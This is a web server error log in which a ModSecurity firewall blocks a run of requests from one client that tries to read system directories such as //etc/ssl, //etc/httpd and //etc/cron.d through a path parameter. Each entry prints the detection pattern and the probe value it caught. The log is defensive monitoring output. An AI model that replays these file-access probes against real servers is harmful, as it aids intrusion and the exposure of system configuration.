[Fri Mar 20 07:37:36.389406 2026] [:error] [pid 9818:tid 140411691570944] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcF1pVZ5mVmJwsFMrngAAAEY"]
[Fri Mar 20 07:37:36.487324 2026] [:error] [pid 31215:tid 140411540502272] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcAF0L0L-SsrnPo5kNQAAAtg"]
[Fri Mar 20 07:37:36.595487 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcF1pVZ5mVmJwsFMrnwAAAEQ"]
[Fri Mar 20 07:37:36.695021 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcAF0L0L-SsrnPo5kNgAAAsI"]
[Fri Mar 20 07:37:36.798335 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcF1pVZ5mVmJwsFMroAAAAEs"]
[Fri Mar 20 07:37:36.890876 2026] [:error] [pid 31215:tid 140411616036608] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcAF0L0L-SsrnPo5kNwAAAs8"]
[Fri Mar 20 07:37:36.994337 2026] [:error] [pid 9818:tid 140411632822016] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcF1pVZ5mVmJwsFMroQAAAE0"]
[Fri Mar 20 07:37:38.516573 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:26921] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcRCii7xarUs8iHZjcAAAAgI"]
[Fri Mar 20 07:37:38.518182 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:62342] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcRCii7xarUs8iHZjbwAAAg0"]
[Fri Mar 20 07:37:38.519190 2026] [:error] [pid 7235:tid 140411624429312] [client 216.73.216.191:55080] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcvqxLDW4GITHUkTiOAAAAQ4"]
[Fri Mar 20 07:37:38.519454 2026] [:error] [pid 9818:tid 140411683178240] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcl1pVZ5mVmJwsFMrpAAAAEc"]
[Fri Mar 20 07:37:38.520811 2026] [:error] [pid 31215:tid 140411674785536] [client 216.73.216.191:20221] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcQF0L0L-SsrnPo5kPgAAAsg"]
[Fri Mar 20 07:37:38.521272 2026] [:error] [pid 9818:tid 140411725141760] [client 216.73.216.191:25825] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcV1pVZ5mVmJwsFMrowAAAEI"]
[Fri Mar 20 07:37:38.524685 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:10941] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcQF0L0L-SsrnPo5kPQAAAss"]
[Fri Mar 20 07:37:38.524947 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:5564] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcQF0L0L-SsrnPo5kOgAAAs0"]
[Fri Mar 20 07:37:38.525265 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcQF0L0L-SsrnPo5kOQAAAso"]
[Fri Mar 20 07:37:38.526284 2026] [:error] [pid 31215:tid 140411666392832] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcQF0L0L-SsrnPo5kOAAAAsk"]
[Fri Mar 20 07:37:38.709467 2026] [:error] [pid 31215:tid 140411590858496] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcgF0L0L-SsrnPo5kPwAAAtI"]
[Fri Mar 20 07:37:38.823119 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcgF0L0L-SsrnPo5kQAAAAtM"]
[Fri Mar 20 07:37:38.911874 2026] [:error] [pid 31215:tid 140411548894976] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcgF0L0L-SsrnPo5kQQAAAtc"]
[Fri Mar 20 07:37:39.027452 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kQgAAAsQ"]
[Fri Mar 20 07:37:39.119899 2026] [:error] [pid 31215:tid 140411716749056] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kQwAAAsM"]
[Fri Mar 20 07:37:39.226717 2026] [:error] [pid 31215:tid 140411641214720] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kRAAAAsw"]
[Fri Mar 20 07:37:39.316236 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kRQAAAsA"]
[Fri Mar 20 07:37:39.429486 2026] [:error] [pid 31215:tid 140411599251200] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kRgAAAtE"]
[Fri Mar 20 07:37:39.519475 2026] [:error] [pid 31215:tid 140411733534464] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kRwAAAsE"]
[Fri Mar 20 07:37:39.631976 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kSAAAAsU"]
[Fri Mar 20 07:37:39.720686 2026] [:error] [pid 31215:tid 140411624429312] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kSQAAAs4"]
[Fri Mar 20 07:37:39.833591 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kSgAAAsc"]
